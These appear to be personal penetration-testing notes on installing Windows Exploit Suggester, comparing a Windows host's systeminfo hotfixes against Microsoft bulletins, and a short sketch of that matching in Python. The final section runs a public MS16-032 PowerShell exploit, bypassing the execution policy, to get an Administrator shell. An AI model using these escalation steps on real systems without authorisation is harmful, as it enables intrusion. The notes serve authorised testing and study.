Windows Exploit Suggester
Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
My fork: https://github.com/amandaguglieri/Windows-Exploit-Suggester
This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
We will create an environment running Python 2.7.18, which the tool requires:
```bash
# List my pyenv python versions (2.7.18 is missing)
pyenv versions
# Install version 2.7.18
pyenv install 2.7.18
# Create a virtualenv that uses python 2.7.18
pyenv virtualenv 2.7.18 tooling2
# Activate the env
pyenv activate tooling2
# Make sure you have the 2.7.18 python version running
python -V
# Install python dependencies into the virtualenv.
# Run this in a directory you can write to: no sudo, so the extracted
# sources are not root-owned and setup.py can write its build files.
wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
tar -xf setuptools-2.0.tar.gz
cd setuptools-2.0/
python setup.py install
cd ..
wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
tar -xf xlrd-1.0.0.tar.gz
cd xlrd-1.0.0/
python setup.py install
```
Now we will gather the output of the `systeminfo` command from the Windows target host and save it on our Kali machine as systeminfo.txt.
Install the Windows Exploit Suggester:
```bash
git clone https://github.com/amandaguglieri/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
```
We then need to update our local copy of the Microsoft Vulnerability database. This command will save the contents to a local Excel file.
```bash
python windows-exploit-suggester.py --update
```
Output:
```text
[*] initiating winsploit version 3.3...
[+] writing to file 2025-04-29-mssb.xls
[*] done
```
Running Windows Exploit Suggester:
```bash
python windows-exploit-suggester.py --database 2025-04-29-mssb.xls --systeminfo systeminfo.txt
```
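To make the comparison concrete, here is an added example (not part of the original notes and not the tool's own code) that parses a saved systeminfo.txt and reports bulletins for which no fixing KB is installed. The host excerpt, KB ids and bulletin names are constructed, and the hard-coded map is an assumption standing in for the downloaded .xls database.

```python
import re

# Constructed systeminfo excerpt (not captured from a real host).
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000101
                           [02]: KB0000102
                           [03]: KB0000205
Network Card(s):           1 NIC(s) Installed.
"""

# Hypothetical bulletin -> fixing-KB map with constructed ids; the real tool
# reads this relationship from the Microsoft bulletin spreadsheet.
BULLETIN_KBS = {
    "BULLETIN-A": {"KB0000101"},
    "BULLETIN-B": {"KB0000300", "KB0000301"},  # either KB counts as patched
    "BULLETIN-C": {"KB0000205"},
}

def parse_systeminfo(text):
    """Return the OS name, OS version and set of installed KB ids."""
    info = {"os_name": None, "os_version": None, "hotfixes": set()}
    in_hotfixes = False
    for line in text.splitlines():
        if in_hotfixes:
            m = re.match(r"\s+\[\d+\]:\s*(KB\d+)", line, re.I)
            if m:
                info["hotfixes"].add(m.group(1).upper())
                continue
            in_hotfixes = False  # first non-entry line ends the list
        key, _, value = (part.strip() for part in line.partition(":"))
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            info["os_version"] = value
        elif key == "Hotfix(s)":
            in_hotfixes = True  # "N/A" simply yields an empty set
    return info

def missing_bulletins(info, bulletin_kbs):
    """Bulletins for which none of the fixing KBs is installed."""
    return sorted(b for b, kbs in bulletin_kbs.items()
                  if not kbs & info["hotfixes"])

if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(host["os_name"], "| missing:", missing_bulletins(host, BULLETIN_KBS))
```

A missing KB is a triage hint, not proof of exposure: later cumulative updates can supersede the KB listed for a bulletin, so confirm each finding against the host's actual patch state.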
#### Exploiting MS16-032 with PowerShell PoC
We will use: https://www.exploit-db.com/exploits/39719
```powershell
Set-ExecutionPolicy bypass -scope process
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
```
And we obtain a cmd shell with Administrator-level privileges.
Last update: 2025-05-18
Created: May 18, 2025 16:41:27